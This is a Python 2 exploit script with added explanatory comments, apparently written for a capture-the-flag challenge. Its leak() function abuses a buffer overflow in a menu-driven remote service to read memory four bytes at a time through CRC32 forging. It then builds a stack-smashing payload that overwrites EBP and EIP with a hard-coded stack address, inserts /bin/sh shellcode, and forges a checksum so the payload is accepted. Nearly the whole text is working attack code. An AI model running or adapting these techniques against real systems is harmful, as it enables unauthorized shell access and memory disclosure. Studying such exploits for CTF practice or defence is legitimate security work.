def leak(str, addr, dest): #leak qword
    """Read memory from the remote service 4 bytes at a time and return one qword.

    Each loop iteration drives the service's text menu twice (option '1' with a
    2040-byte filler plus the packed address, then option '3'), parses the hex
    value it echoes back after 'Response: ', and hands that value to
    ``crc32.forge`` together with the current 8-byte window ``str``.  The 4 bytes
    that ``forge`` returns past offset 8 are appended to ``res`` and the window
    is slid forward by 4 bytes.

    Args:
        str:  8-byte seed window that is slid 4 bytes per iteration
              (NOTE(review): shadows the ``str`` builtin inside this function).
        addr: first address to read; advanced by 4 each iteration.
        dest: address that bounds the read; together with ``addr`` it fixes the
              iteration count.

    Returns:
        ``u64`` of the last 8 bytes accumulated in ``res``.

    Relies on module-level names not visible here: ``r`` (the remote tube),
    ``p64``/``u64`` and ``crc32.forge``.  ``print n`` marks this as Python 2, so
    ``/`` below is integer division; under Python 3 ``range(n)`` would receive
    a float and raise TypeError.
    """
    # Number of 4-byte reads needed to cover [addr, dest] — relies on Python 2
    # integer division.
    n = (dest - addr -8)/4 + 2
    print n
    res = ''
    for i in range(n):
        # Menu option 1: the 2040-byte prefix places the packed address at the
        # position the service later reads from (offset is inferred from the
        # payload layout, not documented here).
        r.recvuntil('# ')
        r.send('1\n')
        r.recvuntil('How many dounts you want? ')
        r.send('x'*2040 + p64(addr) + 'aaaaaaaa\n')
        # Menu option 3 makes the service echo a hex value derived from the
        # memory at ``addr``.
        r.recvuntil('# ')
        r.send('3\n')
        r.recvuntil('Input your local system timestamp: ')
        r.send('aaa\n')
        r.recvuntil('Response: ')
        # Strip the trailing newline and parse the echoed hex number.
        x = int(r.recvuntil('\n')[:-1], 16)
        # crc32.forge is not visible here; presumably it recovers the 4 bytes
        # that, appended to ``str``, produce checksum ``x`` — confirm against
        # its definition.  Only the bytes after offset 8 are kept.
        x = crc32.forge(x, str, 8)[8:]
        # print hex(u32(x))
        # print b2a_hex(x)
        # Slide the 8-byte window forward by the 4 recovered bytes.
        str = str[4:]+x
        res += x
        addr += 4
    # print 'str',b2a_hex(str)
    # print b2a_hex(res)
    # Only the final 8 recovered bytes form the returned qword.
    return u64(res[-8:])
# Build a 0x100-byte pattern whose EBP/EIP slots are patched to a hard-coded
# stack address, then pass it through ``forge`` so that it carries the expected
# checksum 0xe1ca95ee.  The fixed ``esp`` value assumes the target's stack
# address does not change between runs (i.e. no ASLR) — an assumption, not
# something this script verifies.  ``cyclic``, ``p32``, ``asm``, ``shellcraft``
# and ``forge`` come from module scope and are not defined here.
esp = 0xffffdc5c
sc = cyclic(0x100)
# If we just let it crash by not patching out any values,
# we see that the register state looks like this:
#
# EBP: 0x61736161 (b'aasa')
# EIP: 0x61746161 (b'aata')
#
# Shellcode would be after that ('aaua')
sc = sc.replace('aasa', p32(esp + 0)) # EBP
sc = sc.replace('aata', p32(esp + 4)) # EIP
# Add in our '/bin/sh' shellcode
sc = sc.replace('aaua', asm(shellcraft.sh()))
# ``forge`` is not visible here; presumably it appends bytes so that the CRC32
# of the result equals the first argument (cf. ``crc32.forge`` used in leak()) —
# confirm against its definition.
forged = forge(0xe1ca95ee, sc)
#
# Find out ESP with this, by setting a breakpoint on
# 080484EC and examining ESP.
#
# gdb = shell.run("bash r.sh gdb %s $'%s'" % (binary, forged))
# gdb.send("""
# set prompt
# break *0x080484EC
# run
# """)
# gdb.clean(2)
# gdb.sendline('printf "%p\\n",$sp')
# esp = gdb.recv().strip()
# log.info("ESP: %s" % esp)